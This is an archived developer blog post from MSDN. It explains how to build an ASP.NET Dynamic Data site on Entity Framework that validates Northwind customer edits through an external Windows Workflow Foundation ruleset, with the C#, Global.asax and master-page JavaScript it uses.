Global.asax and find the commented line starting with model.RegisterContext and change it to: model.RegisterContext(new Microsoft.Web.DynamicData.EFDataModelProvider (typeof(NorthwindModel.NorthwindEntities)), new ContextConfiguration() { ScaffoldAllTables = true }); The other change I made was to update the route. Instead of using Edit.aspx for edits, I instead wanted to use ListDetails.aspx for a master/detail view, also allowing me to use the GridView control. I edited the Global.asax to the following. <%@ Application Language="C#" %> <%@ Import Namespace="System.Web.Routing" %> <%@ Import Namespace="System.Web.DynamicData" %> <script RunAt="server"> public static void RegisterRoutes(RouteCollection routes) { MetaModel model = new MetaModel(); model.RegisterContext(new Microsoft.Web.DynamicData.EFDataModelProvider(typeof(NorthwindModel.NorthwindEntities)), new ContextConfiguration() { ScaffoldAllTables = true }); // }); routes.Add(new DynamicDataRoute("{table}/ListDetails.aspx") { Action = PageAction.Details, ViewName = "ListDetails", Model = model }); } void Application_Start(object sender, EventArgs e) { RegisterRoutes(RouteTable.Routes); } </script> You should be able to hit F5 and have a working application so far (make sure to set Default.aspx as the startup page for the web application). There's probably a more elegant way to do this, but I needed a way to signal if an entity is valid and also to trap the validation message for the entity. The easiest way to do this is to create a partial type for your entity class and add 2 properties, Valid and ValidationMessage. We'll use these properties from our rules engine. namespace NorthwindModel { public partial class Customers : EntityObject { public bool Valid { get; set; } public string ValidationMessage { get; set; } } In hindsight, I probably could've created a common interface and used it for all of the entities. There might even be something there for Entity Framework and Dynamic Data to automatically add this type of error in, I'll leave investigation of this approach as an exercise to the reader. The next step is to deploy the web application. Right-click on the web project and choose "Publish Web Site". In that screen, I checked "Emit debug information" because I wanted to make sure that I could step through the types during debugging. Make sure to note the directory where you published the web site to, you will need this directory in a subsequent step. The next step is to download the External Ruleset Demo from the MSDN RuleSet Sample in the SDK. This is a fantastic demo application for Windows Workflow Foundation that allows you to use the Windows Workflow Foundation rules engine in your application without using workflows. Download the package and then run Setup.bat to create the Rules database. Next, load up the ExternalRuleSetToolKit.sln into Visual Studio 2008 to convert the application from Visual Studio 2005 to Visual Studio 2008 format. Once that's done, hit F5 to run the solution. Once the RuleSetTool application is running, click the New button. This will create a new ruleset. Give it a name (I called mine "ValidateCustomer"). On the top right of the form, there is a button to browse to a selected workflow or type. Click that browse button, then click browse again on the resulting "Workflow/Type Selection" dialog, and browse to the location of your published web application. Under that folder, choose "App_Code.dll". After selecting the App_Code.dll, the dialog will show you a list of contained types and their members. I chose the "NorthwindModel.Customers" entity type that was generated by the Entity Framework designer. Once you select the type and click OK, the final screen looks like this. The next thing to do is to add your rules. This was the part where I stepped back and said "whoa, I can't believe this is so easy". Click the "Edit Rules" button. This is where you will actually define rules. For instance, I added a rule "AddressIsValid" where I check to see if the Address is null or empty. If it is, then I set Valid to false and set the ValidationMessage property to "Address is missing." Similarly, I added a rule that checks the CompanyName to see if it contains a specific value and set Valid and ValidationMessage appropriately. Once you define the rules, click OK. On the main form, go to the "Rule Store" menu item and click Save. This one took awhile for me to find because I am not very familiar with Entity Framework. A quick search yielded "How to: Execute Business Logic When Saving Changes". This is where we evaluate the rules in our application. Create a partial class for the context type. Add a partial method OnContextCreated that provides a handler for the SavingChanges event. In this event handler, add the following code. public partial class NorthwindEntities { partial void OnContextCreated() { this.SavingChanges += new EventHandler(NorthwindEntities_SavingChanges); } void NorthwindEntities_SavingChanges(object sender, EventArgs e) { // Validate the state of each entity in the context // before SaveChanges can succeed. foreach (ObjectStateEntry entry in ((ObjectContext)sender).ObjectStateManager.GetObjectStateEntries( EntityState.Added | EntityState.Modified)) { // Find an object state entry for a SalesOrderHeader object. if (!entry.IsRelationship && (entry.Entity.GetType() == typeof(Customers))) { Customers customerToCheck = entry.Entity as Customers; customerToCheck.Valid = true; RuleSetService svc = new RuleSetService(); RuleSet ruleset = svc.GetRuleSet(new RuleSetInfo("ValidateCustomer")); RuleExecution exec = new RuleExecution(new RuleValidation(customerToCheck.GetType(), null), customerToCheck); ruleset.Execute(exec); if (!customerToCheck.Valid) throw new ArgumentException(customerToCheck.ValidationMessage); } } } Note that this is where the Valid and ValidationMessage properties come into play. We use this to determine if the rules fail and subsequently throw an exception. This is how we signal to our application that there are business logic errors above the field validation that we get through dynamic data and entity framework. However, now we have a problem... we need to handle the error in the application. This took me awhile to figure out, but the answer was really easy. When in doubt, steal borrow someone else's code! While researching how to handle asynchronous postback errors, I stumbled upon this example (). I modified their example slightly, and ended up with the following code. Open the master page, Site.master, and modify it to include script to handle the error. <%@ Master Language="C#" CodeFile="Site.master.cs" Inherits="Site" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <html xmlns=""> <head runat="server"> <title>Dynamic Data Site</title> <link href="~/Site.css" rel="stylesheet" type="text/css" /> </head> <body class="template" id="bodytag"> <h1><span class="allcaps">Dynamic Data Site</span></h1> <div class="back"> <a runat="server" href="~/"><img alt="Back to home page" runat="server" src="DynamicData/Content/Images/back.gif" />Back to home page</a> </div> <form id="form1" runat="server"> <script type="text/javascript" language="javascript"> var divElem = 'AlertDiv'; var messageElem = 'AlertMessage'; var errorMessageAdditional = 'Please try again.'; var bodyTag = 'bodytag'; Sys.WebForms.PageRequestManager.getInstance().add_endRequest(EndRequestHandler); function ToggleAlertDiv(visString) { if (visString == 'hidden') { $get(bodyTag).style.backgroundColor = 'white'; } else { $get(bodyTag).style.backgroundColor = 'yellow'; } var adiv = $get(divElem); adiv.style.visibility = visString; } function ClearErrorState() { $get(messageElem).innerHTML = ''; ToggleAlertDiv('hidden'); } function EndRequestHandler(sender, args) { if (args.get_error() != undefined && args.get_error().httpStatusCode == '500') { var errorMessage = args.get_error().message args.set_errorHandled(true); ToggleAlertDiv('visible'); $get(messageElem).innerHTML = '"' + errorMessage + '" ' + errorMessageAdditional; } } </script> <div id="AlertDiv" style="visibility:hidden"> <div id="AlertMessage" style="color:Red"> </div> </div> <div> <asp:ScriptManager <asp:ContentPlaceHolder </asp:ContentPlaceHolder> </div> </form> </body> </html> The modifications I made include getting rid of the "clear" button, changing the background color to yellow, and changing the error font to red. Now, when an error occurs, the background is altered to signal to the user that there was a problem. This also leaves the ASP.NET GridView in the edit mode. One problem, though... how do we clear the error? This stumped me for awhile, until I came across the obvious solution. Simply add an onclick handler to the GridView in ListDetails.aspx.cs. protected void OnGridViewDataBound(object sender, EventArgs e) { if (GridView1.Rows.Count == 0) { DetailsView1.ChangeMode(DetailsViewMode.Insert); } GridView1.Attributes.Add("onclick", "ClearErrorState()"); } This is what is so cool... the whole application took me hardly any time at all and now I have business rules externalized from a fully functional application. When I click on the Customers entity, I have a grid of customers. Click edit, and change one of the values to have the rules engine set the Valid property to false. This causes the background to turn yellow and the error to display with a red font. What's also incredibly cool is the user experience. The row is left in edit mode, the background is yellow, the font is red. They just click anywhere in the GridView, and the background returns to white and the error message goes away. Now, here's what blows me away. With the web app still running, run the RuleSetTookit project again and change the rule. For instance, I changed the IsCompanyValid rule to check that any customer with a country anywhere other than "United States" to also have a "Region" value. Update the same record again, choosing the country as something other than United States, and the application will show another error. This is because the rules are externalized from the application, they can be changed on the fly without modifying your code. I'll admit that it took me about 2 hours to put this together in the middle of phone calls and having to research stuff. I just don't get to code as much these days and my skills are rusty. However, once I learned how to do everything, I can put the whole site together in about 6 minutes. I should do the whole thing as a screencast just to show how little effort is involved to do this. Dynamic Data Entity Framework Workaround External RuleSet Demo How to: Execute Business Logic When Saving Changes System.Web.UI.ScriptManager.OnAsyncPostBackError PingBack from Just pure goodness... Thanks for putting this example together.
http://blogs.msdn.com/kaevans/archive/2008/11/07/using-asp-net-dynamic-data-with-the-windows-workflow-foundation-rules-engine.aspx
crawl-002
refinedweb
1,910
50.63
The source tutorial: Msdn.microsoft.com Tutorial steps were made quicker, so you can make this program a lot faster. To make programs programmed in C#, first you'll need Micro$oft Visual C# 2010 Express: Microsoft.com Direct link: Download.microsoft.com After Installation The difference between solution and project terms: a solution can hold many projects a project can hold many files Projects can be compiled (made actual programs) separately. Also remember to use saving option often during this tutorial. (CTRL + S, or Save icon shown below in the picture.) How to make a picture viewer? 1. Run Visual C# 2010 2. Select New Project, select Windows Forms Application 3. Name it PictureViewer 4. Click Save All icon to save the whole solution 5. Name and Solution Name should be e.g. PictureViewer 6. Press F5 on the keyboard to compile and run the program to see it 7. Close your program window 8. In C# Express, select your window/form so it's active and its properties are displayed 9. Set Text property to Picture Viewer (with a space between, it's allowed) 10. Set Size property to 550, 350 11. Choose from Toolbox a container called TableLayoutPanel, double click it. 12. Select this TableLayout Panel, so its properties (and not the main form) are displayed 13. Select its Dock property and set it to the middle 14. Click the triangle/arrow of your TableLayoutPanel (in the upper right corner) to display TableLayoutPanel Tasks 15. Select Edit Rows and Columns 16. In Column and Row Styles set Column1 to 15%, and Column2 to 85%, then next to "Show:" choose Rows 17. Set Row1 to 90%, and Row2 to 10%, and click OK 18. From Toolbox, category Common Controls, add PictureBox 19. Select PictureBox Tasks, click Dock in Parent Container 20. Change PictureBox ColumnSpan property to 2 21. Make sure TableLayoutPanel is selected, and not PictureBox in Properties 22. Add CheckBox from Common Controls/Toolbox 23. Change CheckBox's Text Property to Stretch 24. Add FlowLayoutPanel from Toolbox/Containers 25. Dock it in Parent Container 26. Make sure FlowLayoutPanel is selected (see Properties section at the side) 27. Add four buttons from Toolbox/Common Controls/Button 28. Select each button, and set their Text (TEXT, NOT NAME!) properties as follows: button1 -> Select a picture button2 -> Clear the picture button3 -> Set the background colour button4 -> Close 29. Hold CTRL key (on the keyboard), and select each button, go to Properties section, set AutoSize property to True 30. Deselect all buttons by clicking elsewhere, then click each button separately, and change their Name property (this time NAME property, not Text): button1 -> selectButton button2 -> clearButton button3 -> backgroundButton button4 -> closeButton 31. Double click each existing button in the form (not Toolbox), plus double-click the checkbox, to insert appropriate code to the editor You should see following code: using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; namespace PictureViewer2 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void selectButton_Click(object sender, EventArgs e) { } private void clearButton_Click(object sender, EventArgs e) { } private void backgroundButton_Click(object sender, EventArgs e) { } private void closeButton_Click(object sender, EventArgs e) { } private void checkBox1_CheckedChanged(object sender, EventArgs e) { } } } 32. Go to Toolbox/Dialogs, choose ColorDialog and OpenFileDialog (double-click to add them) 33. Change OpenFileDialog1's Filter property to: JPEG Files (*.jpg)|*.jpg|PNG Files (*.png)|*.png|BMP Files (*.bmp)|*.bmp|All files (*.*)|*.* (CTRL + C to copy this text, and then CTRL+V to insert it there in the Filter property box.) 34. Change Title property to Select a picture 35. Now you need to go to Form1.cs tab (not Form1.cs [Design]!), and write some new code: private void selectButton_Click(object sender, EventArgs e) { if (openFileDialog1.ShowDialog() == DialogResult.OK) { pictureBox1.Load(openFileDialog1.FileName); } } private void clearButton_Click(object sender, EventArgs e) { pictureBox1.Image = null; } private void backgroundButton_Click(object sender, EventArgs e) { if (colorDialog1.ShowDialog() == DialogResult.OK) pictureBox1.BackColor = colorDialog1.Color; } private void closeButton_Click(object sender, EventArgs e) { this.Close(); } private void checkBox1_CheckedChanged(object sender, EventArgs e) { if (checkBox1.Checked) pictureBox1.SizeMode = PictureBoxSizeMode.StretchImage; else pictureBox1.SizeMode = PictureBoxSizeMode.Normal; } 36. Press F5 to run your program, and test it all out! That's all to make a simple picture viewer quickly. For more information and explanations you can go here: Msdn.microsoft.com This comment is currently awaiting admin approval, join now to view.
https://www.moddb.com/groups/curly-bracket-programming-realm/tutorials/c-how-to-make-a-picture-viewer-program
CC-MAIN-2019-04
refinedweb
742
52.15
Lecture 10. What will I learn in this lecture?. What is the difference between machine code and C? Why use C? How do execution of C and Matlab programs differ? What are three methods of expressing a program algorithm? Related Chapters: FER Chapters 1 & 2 . Digital I learn in this lecture? Digital Computer Hardware Input Devices instr1 0 - 3 Control Unit (CU) 4 - 7 instr2 . . . . . . Arithmetic -Logic Unit (ALU) Auxiliary Storage 100 -107 101.101 108 -109 -75 110 -121 label Output Devices CPU Main Memory(RAM) Memory Addresses System Unit Digital Computer Hardware Main (Internal) Memory: • All data and instructions are stored in main memory as a sequence of 0’s and 1’s called Bits (Binary Digits) • Byte (smallest addressable element of memory) Storage size for one character of information (ASCII-8 8 bits). Every (single) address refers to a byte in memory. Digital Computer Hardware Instruction Cycle Control Unit Main Memory 1 Fetch Decode 2 Execution Cycle CPU RAM 3 Execute Store 4 Arithmetic/Logic Unit Includes Cache (very fast memory) Classified as • Machine Language (binary-based code; machine dependent) • Assembly Language (mnemonic form of machine language) • Closer to natural languages. • Generally, machine independent • Usually, several machine instructions are combined into one high-level instruction. • Examples: FORTRAN COBOL BASIC Java To illustrate differences in syntax for language levels, consider how a computer could be instructed to subtract two numbers stored in memory address locations 64 and 2048 and put the result in location 2048: Variable Names increment 64 Memory Addresses value 2048 Variable Names increment 64 Memory Addresses value 2048 • Machine Language: 0111110000000100000000100000000000 (6-bit OpCode, 14-bit address fields with values 64 and 2048) VariableNames increment 64 MemoryAddresses value 2048 • Assembly Language: S increment,value • C Language: value = value - increment; Processing a High-Level Language Program Programs written in high-level languages must be converted to machine language. Two approaches: (1) Compilation (see p. 28 FER Figure 2.4) Used with C, C++, Fortran,...(2) Interpretation Used with Matlab, Visual Basic,... Step 1) Use editor to create a “source” file.We will name source files with a suffix “.c” Step 2) Run the gcc compiler on the source file to create anexecutable or object file with the default name a.out . For CS101 we will only create executable files. Step 3) Check to see if gcc caught any syntax errors , if so go back to step 1) Step 4) Run the program by typing> a.outat the Unix prompt Computer programming is the art/science of transforming a “real world” problem into a finite sequence of instructions(statements) in a computer language. The method stated in the following slide will be used throughout the rest of the semester. Follow this method in your Labs and for any Machine Problem. Software Development Method (these vary just slightly from the method described on p.37 in FER) 1. Requirements Specification (Problem Definition) 2. Analysis---Refine, Generalize, Decompose the problem definition (i.e., identify sub-problems, I/O, etc.) 3. Design---Develop Algorithm (processing steps to solve problem)Use one of the following: Natural-Language Algorithm Flowchart Algorithm Pseudo-code Algorithm 4. Implementation --- Write the "Program" (Code) 5. Verification and Testing --- Test and Debug the Code 1. Requirements Specification (Problem Definition)Given a light-bulb with a pre-measured power consumption(in watts), compute the resistance (in ohms) of the bulb. 2. Analysis---Refine, Generalize, Decompose the problem definition (i.e., identify sub-problems, I/O, etc.) Input = real number representing power Output=real number representing resistance 3. Design---Develop Algorithm Natural-Language Algorithm Prompt user for the power dissipation Read power Store value in storage location called power. Compute the resistance solving the formula “power = (voltage*voltage)/resistance” in terms of resistance. resistance = (voltage * voltage)/ power Print out the value stored in location resistance. 3. Design---Develop Algorithm Pseudo-code Algorithm print “enter power in watts” read power resistance = (117.0 * 117.0)/power print resistance 3. Design---Develop Algorithm Flowchart Algorithm start Output : “enter power in watts” Flow is assumed down unless otherwise specified with an arrow. Trapezoid used to designate I/O. Rectangle used to designate one or more statements in a block. Circle used as continuation symbol for transfer to another page. Input : power Compute: resistance=(117*117)/power Output::resistance stop 4. Implementation --- Write the "Program" (Code) (see the next slide) The lecture slides show the use of the Xemacseditor but the choice of editor is not critical. In labs we will use the Eclipse editor. C Code Implementation of the Algorithm /* C Program to compute the resistance */ /* of a light-bulb.*/ #include <stdio.h> #define VAC 117.0 void main(void) { /* Declare variables. */ float power, resistance; /* request user input power of */ /* light-bulb in watts. */ printf(”Please enter power(watts) :”); /* read value power */ scanf("%f", &power); /* Compute resistance assuming VAC = 117. */ resistance = (VAC * VAC) /power; /* Output the calculated resistance. */ printf(”Resistance is %f (ohms)\n", resistance); } (Note indentation scheme in above code.) your code.. C program compilation Click the “Save” button in Xemacs to save your code but don’t close the Xemacs window. Click the xterm button to open another window. Use the “gcc” program to compile your C source code in the file “resistance.c”. > ls resistance.c resistance.c~ Note: backup files begin and/or end with a ~ or a # symbol. Do not edit or compile these files! > gcc resistance.c The “gcc” program will not alter the file “resistance.c”. The output of “gcc” is by default contained in the file “a.out”. The file “a.out” is called an executable file. (continued on next slide) Note that the “gcc” program noted an error on line 16 in the program and “gcc” generated a warning for line 7. Also, note that there is no a.out file listed. Errors cause gcc to abort and you will not get an a.out file. Go back to Xemacs line 16 and fix the syntax error. (continued on next slide) The error on line 16 was actually caused by a missing semicolon on line 14. In C a semicolon means “end of statement”. This differs from Matlab where a semicolon means suppress output and is optional. Since there was no semicolon after line 14, C assumed that lines 14 - 16 represented one C statement. That is incorrect syntactically, so gcc (the compiler program or compiler for short) generated an error message and terminated before producing an a.out file. After adding a semicolon to the end of line 14, Click “Save” in Xemacs and go back to the xterm and type again... Note: The dot-slash in “ ./a.out ” means “ in this working directory”. If you type “ a.out ” at the Unix prompt Unix will first search your home directory for a file “ a.out ”. Of course this would not be the same “ a.out ” file you created in another directory. What have I learned in this lecture? A CPU only executes machine code which consists of instructions that are specific to a particular manufacturer. The machine code is a sequence of ones and zeros. The C language is more human-language-like than machine code and can be converted to machine code by using a compiler (gcc in CS101). C code is more portable than machine code. In the design and development of an algorithm we can use any combination of “Natural Language”, “Pseudo-code” and “Flow-chart” . Matlab code is executed by means of an interpreter that is running in the Matlab “environment”. Each time the Matlab code runs the interpreter converts the code into machine code. C code is compiled into an executable file (machine code) once. We then run the program (default name a.out) by typing the name of the executable file (a.out)_at the Unix prompt.
https://www.slideserve.com/Faraday/lecture-10-10-2-what-is-the-difference-between-machine
CC-MAIN-2018-51
refinedweb
1,301
58.48
06 September 2012 11:44 [Source: ICIS news] SINGAPORE (ICIS)--Crude futures rose on Thursday, rising by more than $1/bbl at one stage, on expectations that the European Central Bank (ECB) will reveal plans for a new bond purchasing programme to address the eurozone debt crisis. At 10:25 GMT, October Brent crude on ?xml:namespace> October NYMEX light sweet crude futures (WTI) were trading at $96.42/bbl, up by $1.06/bbl from the previous close. Earlier, the ECB president Mario Draghi is expected to announce plans to buy bonds of the heavily debt-laden eurozone nations such as Borrowing costs for 10-year Spanish bonds are presently around 6.42%, while Traders also await the release of US August employment data on Friday. Weak data may encourage the US Federal Reserve consider a further round of quantitative easing to stimulate
http://www.icis.com/Articles/2012/09/06/9593154/crude-futures-rise-1bbl-on-hopes-over-ecb-measure.html
CC-MAIN-2014-35
refinedweb
144
54.73
In the last article, I gave you a short introduction to scripting in Unity. Now let’s take that a bit further by making our player move when the game begins! We’ll discuss vectors, translations, and framerate independence. Translating Game Objects First I’ll take you through the steps to move our player automatically, and then we will break down how it works. To get started, let’s take a look at the Unity transform documentation. Remember, you can quickly access contextual documentation from the inspector by clicking the question button. Now click the “Switch to Scripting” button near the top. Now scroll down and take a look at the public methods available to us on the transform. We want to move the player GameObject along the X and Y axis. Let’s check out the details of the Translate method. The docs say translate Moves the transform in the direction and distance of translation which is precisely what we want. Since we want the player to move every frame, we need to use the Update method, which is called every frame of the game loop (typically 30 or 60 frames per second). First, let’s have the player move toward the right of the screen. Open the Player.cs file in your favorite code editor and add a call to Translate from the transform, providing a Vector with the value of X as 1 (0 for Y and Z. // Update is called once per frame void Update() { transform.Translate(new Vector3(1, 0, 0)); } Remember, the Vector class also has several static members that we can use for common scenarios such as this. Let’s change this to use Vector3.right instead. // Update is called once per frame void Update() { transform.Translate(Vector3.right); } Now let’s see what happens when we start the game in Unity. Whoa, that was fast! Our player cube should have moved automatically to the right and off the screen. Congrats on creating movement in your first game! It seems like magic for one line of code to accomplish movement like this. You might be wondering exactly what is this line doing; how does it work? Let’s break it down. How Translation Works To reiterate, we do not call the Update method ourselves; it is called by Unity (the engine) for every frame of our game. This is import to grasp, because it means any code we place inside the Update method will be executed 30, 60 or more times every second. Through Vector3.right, we’re providing the translate method the values 1 for X, and 0 for Y and Z. For every call to Update, we are telling the transform to translate from it’s current position, to 1 on X axis, and 0 on the Y and Z axes. What does a value of 1 represent in this context though? By default in Unity 1 unit is a meter. That’s what the Translate method does - it translates the GameObject/transform by the Vector you provide, which gives it the direction and distance to move. How then would we move to the left? Of course, we could use Vector3.left instead of Vector3.right, but why does that translation work? Exactly! Moving left would be we have a vector with an X value of -1, which would subtract 1 from the X position. Wait, if the player is suppose to be moving 1 unit or meter every second, why did the player move so fast? It’s time we talk about framerate independence. Framerate Independence For you, the player may have move off screen in less than a second after starting the game. If we were to play on a slower machine, each frame would take longer to execute, thus slow down the speed of the player. Yikes! We don’t want the speed of our game object’s movement to differ based on the speed of the machine the game is running on. What a terrible experience that would be, especially for multiplayer games! The problem is our code is currently framerate dependent. We’re not taking into account the time it takes for each frame to complete. If we had the difference in time since the last frame, we could multiply our vector to adjust the X value of the Vector by that difference to get a consistent movement speed across machines, regardless of their potential speed. As it turns out, we do have access to that delta! It’s called Delta Time and it’s a static variable that’s available on Unity’s Time class. Let’s check out the docs. The docs say delta time is “the interval in seconds from the last frame to the current one”. That’s exactly what we need. We don’t need to import a new namespace to use the Time class because it’s part of UnityEngine, which we already have a using directive for on line 3. // Update is called once per frame void Update() { transform.Translate(Vector3.right * Time.deltaTime); } Here’s the result. Not as exciting as the cube racing off the screen, sure, but now we have framerate independence! Multiplying Vectors Let’s talk about some simple math that’s involved in this operation. What happens when we multiply a vector with another number? Each component of the vector is multiplied by the number. The product of vector (1, 0, 0) and 0.5 would be 0.5, 0, and 0 because 0.5 * 1 is 0.5 and any number multiplied by zero equals zero. Variable Speed We want the player to move a bit faster for our prototype, so let's create an easy way for us to add variable speed that can be adjusted easily as we playtest the game and try different speed values. This is an important concept that we will reiterate several times through this series. When you think about working with other people on a team outside of the engineering team, you want them to be able to playtest the game and make adjustments without contacting you every time they want to try to speed something up or slow it down. Unity has a mechanism to support editing variables in the editor, even while the game is running! We'll get into that soon. First, let's hard code a value to adjust the speed to get started. Let's go 5 times the speed. In order to do that, we need to add a multiplier like this. // Update is called once per frame void Update() { transform.Translate(Time.deltaTime * 5 * Vector3.right); } Thanks to the commutative property of multiplication, we can rearrange the order of the numbers being multiplied and get the same result. I moved Time.deltaTime and our speed multiplier before Vector3.right. The reason is because it requires less multiplication calls overall when ordered this way, since we'll end up with a single number to multiple across the vector's components (x,yz). Right now, we've hard coded the speed multiplier, which means over time if we ever need to change the value we'll have to find this exact location and change it here. That should feel bad. Our literal value of 5 does not express the intent either. This is what we call a magic number. We are not just writing code for the computer; we are writing it for ourselves and our teammates. Therefore, I recommend writing code that expresses your intent to the best of your ability. Let's give this lonely number a name to express our intent. Scroll to the top of the file and add a public speed field of type float to the Player class. public class Player : MonoBehaviour { public float speed = 5.0f; ... } This creates a field that belongs to our Player class. It is public, which means that any other script in our game can access and modify the speed variable, which we don't want. We'll change the access modifier soon. We're using the data type float, which allows us to represent floating-point decimal numbers because we want to have floating-point precision for specifying values for our speed. Finally, we set the value to 5.0f, which might seem strange at first. Why do we suffix the literal value with an f? If you remove the f and go back to the Unity editor, you'll see It causes a compiler error with this message. readonly struct System.Double Literal of type double cannot be implicitly converted to type 'float'; use an 'F' suffix to create a literal of this type This is telling us that the compiler doesn't know if you intended for the value to resolve as a double or a float. So we add the f suffix to tell the compiler we intend for the value to be a float. Without going into a ton of detail about the double data type, just know that it is double the size of a float, which allows us to store a more precise number with more places after the decimal. You can read more about floating-point types in the docs. Now let's replace that 5 with our new speed variable. // Update is called once per frame void Update() { transform.Translate(Time.deltaTime * speed * Vector3.right); } Now for the real magic! Let's go back to the Unity editor and select the player in the hierarchy. Look at the inspector for the speed variable that we set to 5. Now you and other members of your team can change this value and it will override what we set in code! However, the value will not persist if you change it while the game is running. If you change the value while the game is running, remember the value you want to keep and set it once you've stopped playing. I said we would change the accessor for the speed variable, so let's do that now. I'm going to remove the public accessor, as it will be private by default. Now we're going to have a problem. Since the field is private, no one else can access it, which means the Unity editor will not be able to allow us to change it from the inspector. Fear not, Unity knew they would need a solution to this and they have provided it in the form of an attribute. In short, an attribute in C# is basically a way of describing some meta detail about the data we've applied the attribute to. The attribute we want to use above the speed field is called SerializeField, and it looks like this. public class Player : MonoBehaviour { [ ] float speed = 5.0f; ... } With the speed variable now private, we've ensured that the data is encapsulated and controlled solely by the Player class and using the SerializeField attribute, we've let Unity know that we want our field to be Serialized so the inspector has access to the variable. I'm going to leave the value at 5 for now, but feel free to experiment with the value for practice. Summary Now we have our player moving when the game starts using framerate independence with delta time! It may not seem like much, but this is a lot to take in when you’re just getting started. Make sure you understand what we’ve covered here and follow along for the next article where we’ll continue to build on these concepts. Take care. Stay awesome.
https://blog.justinhhorner.com/player-movement-using-translate
CC-MAIN-2022-27
refinedweb
1,933
73.07
SuanShu Scripting in Groovy We can make Groovy into one all-powerful math computing environment for numerical analysis. Groovy is an object-oriented programming language for the Java platform. It is dynamically compiled to Java Virtual Machine bytecode and therefore inter-operates with SuanShu and other Java libraries. Most Java code is also syntactically valid Groovy. Groovy uses a Java-like but simplified syntax. For example, Groovy syntax removes type (dynamic type), semicolons (optional), return keyword (optional). If you already know Java, the learning effort will be minimal. Therefore, Groovy is a popular scripting language for the Java platform. Setup This section describes how to set up in Groovy to use SuanShu to do numerical computing. - You need a copy of suanshu.jar and a valid SuanShu license. You may download and purchase our products here. - Download the latest stable version of Groovy from the Groovy website, here. - Run the installer. When choosing the destination folder, please use one that contains no space and special characters. We recommend for example “C:\Groovy\Groovy-1.7.5”. 4. Configure the environment variables as in the picture below. 5. Set up the environment variable JAVA_HOME to point to where your JDK is installed. For example, “C:\Program Files (x86)\Java\jdk1.6.0_20”. - Create the Groovy ${user.home} folder. The user.home system property is set by your operating system. For example, it can be C:\Users\Haksun Li on Vista, or C:\Document and Settings\Haksun Li on XP. Create the folder “.groovy”. Please note that when you rename on Windows, you need to type “.groovy.” (a “.” at the end) otherwise Windows will complain (a bug?). Then create the “lib” folder in “.groovy”. - Setup SuanShu. Copy and paste the SuanShu jar files, e.g., “suanshu.jar” in .groovy/lib. Copy the SuanShu license file “suanshu.lic” into .groovy. 8. Modify the Groovy shortcuts to start in the .groovy folder. I created two shortcuts on desktop: one for the Groovy shell (groovysh.exe) and another for the Groovy Console (GroovyConsole). The start-in folder is the current/working directory for Groovy. The SuanShu license management will look for the license file in the current directory. 9. Congratulations! You are now set up with Groovy and ready to go. You can start up the Groovy shell by double clicking on groovysh.exe (or the shortcut you created). Type this to say ‘hi’. println hi - You may modify the properties on the shell screen by clicking on the Groovy icon at the upper left hand corner. I changed mine to white background and black font. Tutorials The best way to learn a language is by imitation and practice. We have prepared some examples to get you started on scripting SuanShu in Groovy. You may want to consult the references below to learn more about Groovy. import For those converting from the Matlab/Octave/R/Scilab, the hardest thing to get used to is “import”. To use any Java class in Groovy, we can either type the fully qualified name such as com.numericalmethod.suanshu.matrix.doubles.dense.DenseMatrix We need to do this every time we want to create a DenseMatrix. This is very cumbersome. Alternatively, we can declare the namespace of DenseMatrix by “importing” them once for all. import com.numericalmethod.suanshu.matrix.doubles.dense.DenseMatrix Or, we can do import com.numericalmethod.suanshu.matrix.doubles.dense.* to import all classes in the package import com.numericalmethod.suanshu.matrix.doubles.dense. Although the keyword “import” saves some typing, it can get cumbersome if you need to import many classes. The Groovy shell partially solves this problem by letting users to put the most often used imports in the shell startup script, “groovysh.rc”. This file is found in the .groovy folder (or you can create one in the folder). We recommend the SuanShu users to include these imports. You can simply copy and paste to append them in your groovysh.rc. Recent Comments
http://numericalmethod.com/up/suanshu/scripting/groovy/
CC-MAIN-2017-26
refinedweb
660
60.31
Xamarin Android: Handle Hardware Key in Spinner Dropdown I've got an Android application written using Xamarin Android (not Xamarin Forms). It runs on a Zebra WT6000, which has hardware keys "P1" and "P2". By default, these are mapped to volume-down and volume-up (respectively). Within my application, I use these keys for other things (and provide an alternative way for the user to manage audio volume). This all works as intended. My problem is that I have a spinner ( Android.Widget.Spinner), and when the spinner is tapped and the dropdown appears, the default button mappings come back in force, ignoring the key handlers in my activity. I have tried this: MySpinner.KeyPress += (sender, evt) => { /* do a thing */ }; and also: MySpinner.SetOnKeyListener(new KeyListener()); ... private class KeyListener : Java.Lang.Object, View.IOnKeyListener { public bool OnKey(View v, [GeneratedEnum] Keycode keyCode, KeyEvent e) { // do a thing return true; } } However, neither my lambda function nor my OnKey() method ever get called, and the key handling doesn't change. I suspect that the spinner's dropdown is its own DialogFragment (with it's own key handling) rather than part of my activity. If so, I suspect I have to call the SetOnKeyListener() of that DialogFragment (rather than the SetOnKeyListener() of the spinner). Any suggestions would be most welcome. 1 answer - answered 2018-11-05 23:28 Douglas Henke I found a way to do this (and by "way to do this" I mean "kludge"). The basic idea is that I have my own custom array adapter (derived from ArrayAdapter) to build the spinner rows. In its GetDropDownView()override, I set the KeyPresshandler of the parent (where said parent is passed in as an argument). Code: public class CustomArrayAdapter<T> : ArrayAdapter<T> { private bool ParentKeyHandlerHasBeenSet; ... public override View GetDropDownView(int position, View convertView, ViewGroup parent) { if (!ParentKeyHandlerHasBeenSet && parent.Id == -1) { parent.KeyPress += (sender, evt) => { evt.Handled = true; }; ParentKeyHandlerHasBeenSet = true; } return MyPrivateMethodThatBuildsTheView(...); } } That's obviously not a lovely, clean solution. If you have a better one, please share.
http://quabr.com/53162552/xamarin-android-handle-hardware-key-in-spinner-dropdown
CC-MAIN-2018-51
refinedweb
335
58.38
